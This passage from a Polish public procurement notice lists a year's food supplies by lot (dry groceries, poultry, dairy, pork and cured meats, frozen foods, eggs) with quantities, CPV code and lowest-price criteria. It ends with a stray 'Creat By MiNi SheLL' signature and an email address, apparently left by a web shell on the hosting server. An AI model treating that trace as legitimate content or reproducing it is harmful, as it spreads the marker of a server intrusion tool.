33.		Kawa zbożowa                                                     500 g	Szt.	40
34.		Ketchup łagodny                                                 500 g	Szt.	220
35.		Kisiel różne smaki Winiary                                   77 g	Szt.	1 000
36.		Kminek                                                                    20 g	Szt.	70
37.		Koncentrat pomidorowy 30%  Pińczów           950g	Szt.	250
38.		Konserwa mięsna  
Przysmak Śniadaniowy                                       300 g	Szt.	650
39.		Koperek suszony                                                    10 g	Szt.	90
40.		Kostki rosołowe drobiowe Winiary                   60 g	Szt.	160
41.		Kostki rosołowe wołowe Winiary                       60 g	Szt.	150
42.		Krem do smarowania pieczywa o smaku czekoladowym                                                     200 g	Szt.	100
43.		Krem do smarowania pieczywa o smaku orzechowym                                                        200 g	Szt.	100
44.		Kukurydza konserwowa                                     400 g	Szt.	350
45.		Kwasek cytrynowy                                                 20 g	Szt.	130
46.		Liść laurowy                                                              7 g	Szt.	85
47.		Majeranek                                                                 8 g	Szt.	120
48.		Majonez  Kielecki                                                500 g	Szt.	600
49.		Makaron nitki Lubella                                           2 kg	kg	380
50.		Makaron łazanki Lubella                                      2 kg	Kg	90
51.		Makaron muszelki  Lubella                                  2 kg	Kg	250
52.		Makaron spaghetti Lubella                                  1 kg	Kg	60
53.		Makaron świderki  Lubella                                   2 kg	kg	450
54.		Margaryna śniadaniowa Bielmar                     500 g	kg	610
55.		Margaryna zwykła                                              250 g	kg	220
56.		Marmolada   Duchnice                                       850 g	Szt.	150
57.		Marynata klasyczna Prymat                                20 g	Szt.	55
58.		Marynata staropolska  Kamis                              20 g	Szt.	110
59.		Masło roślinne kubek Kruszwica                     250 g	kg	400
60.		Mąka pszenna wrocławska                                1 kg	kg	450
61.		Mąka ziemniaczana                                               1 kg	kg	15
62.		Mąka żytnia typ 500                                              1 kg	kg	120
63.		Miód pszczeli  wielokwiatowy                          370 g	Szt.	150
64.		Mlekołaki kulki, kółka kakaowe                       250 g	Szt.	30
65.		Morele suszone                                                   150 g	Szt.	10
66.		Musztarda   stołowa                                           190 g	Szt.	300
67.		Ocet                                                                         0,5 l	Szt.	10
68.		Ogórki konserwowe                                            850 g	Szt.	500
69.		Olej uniwersalny   Kruszwica                                  1 l                                 	L	480
70.		Oregano                                                                  10 g	Szt.	30
71.		Papryka konserwowa                                         780 g	Szt.	110
72.		Papryka ostra                                                         20 g	Szt.	65
73.		Papryka słodka                                                       20 g	Szt.	80
74.		Pasztet drobiowy  Podlaski                                155 g                                              	Szt.	700
75.		Pasztet Mazowiecki                                             460g	Szt.	280
76.		Pieczarki marynowane                                       770 g	Szt.	200
77.		Pieprz naturalny mielony                                     20 g	Szt.	420
78.		Pieprz ziołowy                                                        20 g	Szt.	420
79.		Pietruszka Suszona                                                10 g                                   	Szt.	100
80.		Płatki jęczmienne                                                  1 kg	kg	55
81.		Płatki kukurydziane                                               1 kg	kg	40
82.		Płatki owsiane                                                        1 kg	kg	60
83.		Pomidory obierane                                             400 g	Szt.	170
84.		Powidła węgierkowe                                          280 g	Szt.	90
85.		Proszek do pieczenia                                            30 g	Szt.	50
86.		Przyprawa do drobiu Cykoria                              40 g	Szt.	50
87.		Przyprawa do ryb Cykoria                                    40 g	Szt.	60
88.		Przyprawa do ziemniaków  Cykoria                   30 g	Szt.	50
89.		Przyprawa  Warzywko                                          1 kg	kg	35
90.		Przyprawa w płynie  Maggi                                     1 l	l	110
91.		Rodzynki                                                               100 g	Szt.	100
92.		Ryż długo ziarnisty biały                                       1 kg	kg	420
93.		Sałatka rybna                                                        150g	Szt.	1400
94.		Sok pomidorowy  Hortex                                       1 l	Szt.	10
95.		Słodzik                                                     op. 1000 szt.	Op.	30
96.		Sól jodowana                                                          1 kg	kg	450
97.		Suchary delikatesowe Mamut                          285 g 	Szt.	10
98.		Susz Warzywny                                                    100 g	Szt.	30
99.		Syrop owocowy Łowicz różne smaki              440ml	Szt.	600
100.		Szczaw konserwowy                                           285 g	Szt.	90
101.		Szprot w oleju                                                     170 g	Szt.	600
102.		Szprot w pomidorach                                         170 g	Szt.	350
103.		Szynka konserwowa mielona  Werbliński       110 g	Szt.	1 000
104.		Śliwki suszone bez pestki                                  150 g	Szt.	100
105.		Tuńczyk w oleju                                                   170 g	Szt.	750
106.		Wiórki kokosowe                                                 100 g	Szt.	10
107.		Woda mineralna gazowana                                 1,5 l	Szt.	800
108.		Woda mineralna niegazowana                           1,5 l	Szt.	200
109.		Zacierki                                                                    1 kg	kg	75
110.		Ziele angielskie                                                       15 g	Szt.	120
111.		Zioła prowansalskie                                              10 g	Szt.	85
112.		Zupa grzybowa  Winiary                                       48 g	Szt.	500
113.		Zupa pieczarkowa Winiary                                   45 g	Szt.	350
114.		Zupa ogonowa Winiary                                        41 g	Szt.	300
115.		Żelatyna spożywcza                                              40 g 	Szt.	100
116.		Soda oczyszczona                                               100 g	Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drób i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	900
2.		Korpusy z kurczaka	kg	500
3.		Filet z kurczaka	kg	600
4.		Ćwiartki  z kurczaka	kg	850
5.		Wątróbka drobiowa	Kg	110
6.		Żołądki z kurczaka	kg	200
7.		Mięso drobiowe gulaszowe II	Kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nabiał i przetwory nabiałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	1 000
2.		Twaróg  półtłusty 	kg	540
3.		Masło extra   82% tłuszczu                       200 g                           	kg	250
4.		Ser żółty  Gouda	kg	270
5.		Jogurt owocowy                                        150 g	Szt.	4 600
6.		Jogurt naturalny                                         450 g	Szt.	1200
7.		Serek topiony   krem. op.                          100 g	Szt.	2 000
8.		Serki homogenizowane waniliowe          100 g	Szt.	350
9.		Serki homogenizowane owocowe          100 g	Szt.	350
10.		Kefir  kubek                                                  450 g	Szt.	850
11.		Śmietana  24 %  kubek                            400 ml	Szt.	1 000
12.		Śmietana 12%  karton       poj.               500ml	Szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso wieprzowe , wędliny  i wyroby podrobowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	380
2.		Boczek surowy bez skóry wieprzowy 	kg	260
3.		Schab  bez kości wieprzowy	kg	280
4.		Szynka bez kości wieprzowa bez skóry	kg	350
5.		Łopatka bez kości wieprzowa bez skóry	kg	350
6.		Słonina wieprzowa bez skóry	kg	200
7.		Podroby wieprzowe bez wątroby	kg	200
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	370
10.		Mięso wieprzowe II 	kg	340
11.		Wątroba wieprzowa 	kg	100
12.		Karczek wieprzowy bez kości	Kg	200
13.		Kości wieprzowe wędzone	Kg	120
14.		Kiełbasa szynkowa wieprzowa	kg	70
15.		Kiełbasa  mielonka tyrolska	Kg	250
16.		Mortadela bez dodatków	Kg	250
17.		Kiełbasa cienka zwyczajna	kg	550
18.		Parówki  wieprzowe	kg	280
19.		Parówki drobiowe	Kg	200
20.		Kiełbasa  krakowska parzona	kg	120
21.		Kiełbasa biała żurkowa	kg	300
22.		Szynka wędzona	kg	15
23.		Ogonówka wieprzowa wędzona 	kg	20
24.		Boczek wędzony	Kg	70
25.		Pasztet pieczony wieprzowy	Kg	160
26.		Salceson  włoski	kg	250
27.		Salceson  czarny	kg	200
28.		Pasztetowa wieprzowa	kg	200
29.		Kaszanka jęczmienna	kg	230
30.		Kiełbasa szynkowa drobiowa	Kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Art. spożywcze mrożone , ryby wędzone i solone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Fasolka szparagowa mrożona                  450 g	Szt.	1 050
2.		Mieszanka kompotowa mrożona                          	kg	180
3.		Mieszanka warzywna mrożona	kg	350
4.		Filet mrożone z miruny	kg	550
5.		Filety śledziowe bez skóry solone	kg	95
6.		Makrela wędzona bez głowy	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Jaja 50-60 g	Szt.	22 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com